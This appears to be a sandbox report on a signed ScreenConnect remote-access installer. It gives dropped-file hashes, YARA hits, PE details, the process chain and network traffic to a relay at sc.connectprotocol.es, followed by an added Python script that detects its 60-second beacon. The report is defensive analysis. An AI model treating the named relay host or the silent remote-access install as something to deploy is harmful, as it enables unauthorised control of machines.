SHA-512:40B70547E2D169ACD68A6C5F3801F5088CC317584C87DA9D1810AB6A6E758CD613C8C9BD4E9B15D8F817BD230A72F47A0F4B1C4BE232DF6DD25256A9470C9754
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF61A468A6AB3D1920.TMP, Author: Joe Security
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.07719567308930654
Encrypted:false
SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOqqtt8YaSKChiVky6l51:2F0i8n0itFzDHFDtR7r
MD5:1965B0922E5F05902EBD5A36FA51A7EE
SHA1:DA72C64B373F9E5C6FF2800577A0B35718B98316
SHA-256:F083B161A780A2D9E4B04487E70C29C0F423A8CAF7F704C1F539EDD520D7F6DA
SHA-512:2375BC18EEF5462771AC0E78EC4872D20F41E5F3DBFE97A3DF51BF5C53920D22713F6BC25B7E54E6FC6C6CD1E261C42B7C5A6F2B02E2600986AD3B9F74639CEC
Malicious:false
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.4270231635734074
Encrypted:false
SSDEEP:48:0pkuyth8FXzvT5aUh9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAdF:UkIRToz9p4fed/4G3f9FDME
MD5:E8F4366B6D0D20FF93DD451C1CDA4FAD
SHA1:E517A01AA68331A5EFA199F279CED46881ACD1DE
SHA-256:31075347213B51170D6F2DBC532C41A5DBBF4501C37318E37F10B6B3018C9629
SHA-512:40B70547E2D169ACD68A6C5F3801F5088CC317584C87DA9D1810AB6A6E758CD613C8C9BD4E9B15D8F817BD230A72F47A0F4B1C4BE232DF6DD25256A9470C9754
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF8EE2806658991912.TMP, Author: Joe Security
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.4270231635734074
Encrypted:false
SSDEEP:48:0pkuyth8FXzvT5aUh9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAdF:UkIRToz9p4fed/4G3f9FDME
MD5:E8F4366B6D0D20FF93DD451C1CDA4FAD
SHA1:E517A01AA68331A5EFA199F279CED46881ACD1DE
SHA-256:31075347213B51170D6F2DBC532C41A5DBBF4501C37318E37F10B6B3018C9629
SHA-512:40B70547E2D169ACD68A6C5F3801F5088CC317584C87DA9D1810AB6A6E758CD613C8C9BD4E9B15D8F817BD230A72F47A0F4B1C4BE232DF6DD25256A9470C9754
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCC421647BED1434B.TMP, Author: Joe Security
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.8095888546286913
Encrypted:false
SSDEEP:48:18PhMuRc06WXzuFT5J9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAX:YhM1zFTs9p4fed/4G3f9FDME
MD5:42308293DC812DF71F43C377513FDC6E
SHA1:10C83D98875F566BD28C64F6E083F4CC811906D8
SHA-256:2C7EED1657BDD2737F64551414D337DA88944DE0429DBB841DFF47479F0C76ED
SHA-512:22695837D539F68F6134EFD04B159A88BBD6C8A0982C8E37B8ADEDFE550BC680F302FC110C76154D03E26EE47C0784AF06D64E3A623EDB13B13FFB49675D17EE
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCD8E0A85204A1AE0.TMP, Author: Joe Security
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.8095888546286913
Encrypted:false
SSDEEP:48:18PhMuRc06WXzuFT5J9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAX:YhM1zFTs9p4fed/4G3f9FDME
MD5:42308293DC812DF71F43C377513FDC6E
SHA1:10C83D98875F566BD28C64F6E083F4CC811906D8
SHA-256:2C7EED1657BDD2737F64551414D337DA88944DE0429DBB841DFF47479F0C76ED
SHA-512:22695837D539F68F6134EFD04B159A88BBD6C8A0982C8E37B8ADEDFE550BC680F302FC110C76154D03E26EE47C0784AF06D64E3A623EDB13B13FFB49675D17EE
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFE92FC617A28FB7B7.TMP, Author: Joe Security
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):69632
                                                                                                                                                                    Entropy (8bit):0.23762406057162272
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:+3JvDDBAduHvlS3qcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrDV9IYI:Mpxp4fed/4G3f9FD9
                                                                                                                                                                    MD5:55E80F3956A3DC808DE23D1F2CD7AFD9
                                                                                                                                                                    SHA1:74524DF5AA9BE20BDDD3A20456C387FA3FCC86F7
                                                                                                                                                                    SHA-256:34EFC7BEBF030C967AF3616625367850771DF61A29EAFA50FA10D82724360078
                                                                                                                                                                    SHA-512:C3879FCA55A9B9CCAA12C5BCEA4434A08428F2BB7E5A43F2A67D264F9490C3B843E7F2A33E70F0F8BBBB972D4DB6B59105CDA7229657D1964D936003E81B0AF6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFFEA70B09147D26F1.TMP, Author: Joe Security
                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.429350374393457
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: f53WqfzzNt.exe
File size: 5'620'624 bytes
MD5: a27847506c27a6bde1a5f7d092bf29d2
SHA1: 5857ffbb63987615da9ea0ffc0e5564e257d7729
SHA256: 5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57
SHA512: 297c206ec0512487a141272c48b4e2d0aa2fe028ea972c914d43b0b9ff4e2305199f02ad42eb99683a457d833d192b8e26e5c50053c2fe33a4c996c00238c16a
SSDEEP: 49152:+EEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:rEs6efPNwJ4t1h0cG5FGJRPxow8O
TLSH: 5C46E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4014ad
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 9771ee6344923fa220489ab01239bdfd
Signature Valid: true
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before, Not After:
• 17/08/2022 01:00:00, 16/08/2025 00:59:59
Subject Chain:
• CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version: 3
Thumbprint MD5: AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256: 82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial: 0B9360051BCCF66642998998D5BA97CE
Instruction (disassembly at entrypoint):
call 00007F9850E79F0Ah
jmp 00007F9850E799BFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040D040h]
push dword ptr [ebp+08h]
call dword ptr [0040D03Ch]
push C0000409h
call dword ptr [0040D044h]
push eax
call dword ptr [0040D048h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040D04Ch]
test eax, eax
je 00007F9850E79B47h
push 00000002h
pop ecx
int 29h
mov dword ptr [004148D8h], eax
mov dword ptr [004148D4h], ecx
mov dword ptr [004148D0h], edx
mov dword ptr [004148CCh], ebx
mov dword ptr [004148C8h], esi
mov dword ptr [004148C4h], edi
mov word ptr [004148F0h], ss
mov word ptr [004148E4h], cs
mov word ptr [004148C0h], ds
mov word ptr [004148BCh], es
mov word ptr [004148B8h], fs
mov word ptr [004148B4h], gs
pushfd
pop dword ptr [004148E8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004148DCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004148E0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004148ECh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00414828h], 00010001h
                                                                                                                                                                    Programming Language:
                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                    • [IMP] VS2008 build 21022
                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x16190
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
FILES | 0x163d4 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3962220149253731
FILES | 0x9c3d4 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111589431762695
FILES | 0x2409d4 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415066442757009
FILES | 0x25b5d4 | 0x2ec318 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9810924530029297
FILES | 0x5478ec | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
RT_MANIFEST | 0x548eec | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
mscoree.dll | CorBindToRuntimeEx
KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 16:23:33.165498018 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:33.285506010 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:33.285624027 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:33.937371016 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:34.057472944 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:34.772422075 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:34.815448999 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:34.853984118 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:34.973916054 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:35.366391897 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:35.409075022 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:35.579916000 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:35.706041098 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:36.801642895 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:36.801899910 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:23:36.921679020 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:36.921706915 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:36.921850920 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:36.921860933 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:23:36.922154903 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:24:36.924963951 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:24:37.045734882 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:25:37.050173998 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:25:37.173549891 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Dec 3, 2024 16:26:37.175321102 CET | 49731 | 8041 | 192.168.2.4 | 38.69.12.167
Dec 3, 2024 16:26:37.295469999 CET | 8041 | 49731 | 38.69.12.167 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 16:23:33.000278950 CET | 55150 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 16:23:33.138247013 CET | 53 | 55150 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 16:23:33.000278950 CET | 192.168.2.4 | 1.1.1.1 | 0x6ee2 | Standard query (0) | sc.connectprotocol.es | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 16:23:33.138247013 CET | 1.1.1.1 | 192.168.2.4 | 0x6ee2 | No error (0) | sc.connectprotocol.es | | 38.69.12.167 | A (IP address) | IN (0x0001) | false
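The TCP table above shows the sample's only peer: after the DNS lookup of sc.connectprotocol.es, the client talks to 38.69.12.167 on port 8041, and once the installer burst is over it sends one packet about every 60 seconds and gets one reply. The script below is an added example, not part of the Joe Sandbox report. It parses a subset of those rows (every client-to-server packet plus a few replies, copied from the table) together with the report's DNS answer, recovers the keep-alive period from the tail of the trace, and notes whether the port is outside an expected set. The thresholds (30 s minimum period, 1 s tolerance, three samples) and the expected-port set {80, 443} are assumptions, not values from the report.

```python
"""Keep-alive cadence check over the report's TCP flow table.

Added example, not part of the Joe Sandbox report. The rows are a subset of
the report's TCP table (every client-to-server packet plus a few replies),
the DNS mapping is the report's; the thresholds and port list are assumptions.
"""
import re
from collections import defaultdict, namedtuple
from datetime import datetime
from statistics import median

Flow = namedtuple("Flow", "ts sport dport src dst")

# Subset of rows copied from the report's TCP table (timestamps are CET).
FLOW_ROWS = """
Dec 3, 2024 16:23:33.165498018 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:33.285506010 CET 8041 49731 38.69.12.167 192.168.2.4
Dec 3, 2024 16:23:33.285624027 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:33.937371016 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:34.815448999 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:34.853984118 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:35.409075022 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:35.706041098 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:36.801642895 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:36.801899910 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:23:36.921679020 CET 8041 49731 38.69.12.167 192.168.2.4
Dec 3, 2024 16:24:36.924963951 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:24:37.045734882 CET 8041 49731 38.69.12.167 192.168.2.4
Dec 3, 2024 16:25:37.050173998 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:25:37.173549891 CET 8041 49731 38.69.12.167 192.168.2.4
Dec 3, 2024 16:26:37.175321102 CET 49731 8041 192.168.2.4 38.69.12.167
Dec 3, 2024 16:26:37.295469999 CET 8041 49731 38.69.12.167 192.168.2.4
"""
# The A record from the report's DNS answer table.
DNS_ANSWERS = {"38.69.12.167": "sc.connectprotocol.es"}
# Ports on which an outbound relay session would not stand out (assumption).
EXPECTED_PORTS = {80, 443}

ROW = re.compile(
    r"^(?P<date>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<src>[\d.]+) (?P<dst>[\d.]+)$")


def parse_flows(text):
    """Turn table rows into Flow records; the nanosecond fraction is cut to microseconds."""
    flows = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # header line or a row the extraction garbled
        ts = datetime.strptime(f"{m['date']}.{m['frac'][:6]}", "%b %d, %Y %H:%M:%S.%f")
        flows.append(Flow(ts, int(m["sport"]), int(m["dport"]), m["src"], m["dst"]))
    return flows


def client_intervals(flows, client_ip):
    """Seconds between consecutive client-to-server packets, keyed by (peer ip, port)."""
    times = defaultdict(list)
    for f in flows:
        if f.src == client_ip:
            times[(f.dst, f.dport)].append(f.ts)
    return {peer: [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
            for peer, ts in times.items()}


def find_beacons(intervals, min_period=30.0, tolerance=1.0, min_run=3):
    """Flag peers whose trailing gaps are near-constant and at least min_period.

    Only the tail of the trace is examined: a session opens with a burst
    (handshake, installer traffic) and only then settles into its keep-alive.
    """
    found = {}
    for (ip, port), gaps in intervals.items():
        run = []
        for g in reversed(gaps):  # walk back from the last gap
            if run and abs(g - run[0]) > tolerance:
                break
            run.append(g)
        if len(run) >= min_run and median(run) >= min_period:
            found[(ip, port)] = {
                "period_s": round(median(run), 1),
                "samples": len(run),
                "name": DNS_ANSWERS.get(ip, "<unresolved>"),
                "nonstandard_port": port not in EXPECTED_PORTS,
            }
    return found


if __name__ == "__main__":
    hits = find_beacons(client_intervals(parse_flows(FLOW_ROWS), "192.168.2.4"))
    for (ip, port), info in hits.items():
        print(f"{info['name']} {ip}:{port} keep-alive every {info['period_s']}s "
              f"({info['samples']} samples), non-standard port: {info['nonstandard_port']}")
```

On the rows from this report the script reports sc.connectprotocol.es 38.69.12.167:8041 with a 60.1 s period over three samples on a non-standard port. Walking back from the end of the trace matters: the first four seconds contain the MSI download and handshake, where the gaps are fractions of a second, and a whole-trace average would hide the cadence.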

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:10:23:25
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\f53WqfzzNt.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\f53WqfzzNt.exe"
                                                                                                                                                                    Imagebase:0xf10000
                                                                                                                                                                    File size:5'620'624 bytes
                                                                                                                                                                    MD5 hash:A27847506C27A6BDE1A5F7D092BF29D2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1747609157.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                    Imagebase:0x7ff743360000
                                                                                                                                                                    File size:69'632 bytes
                                                                                                                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
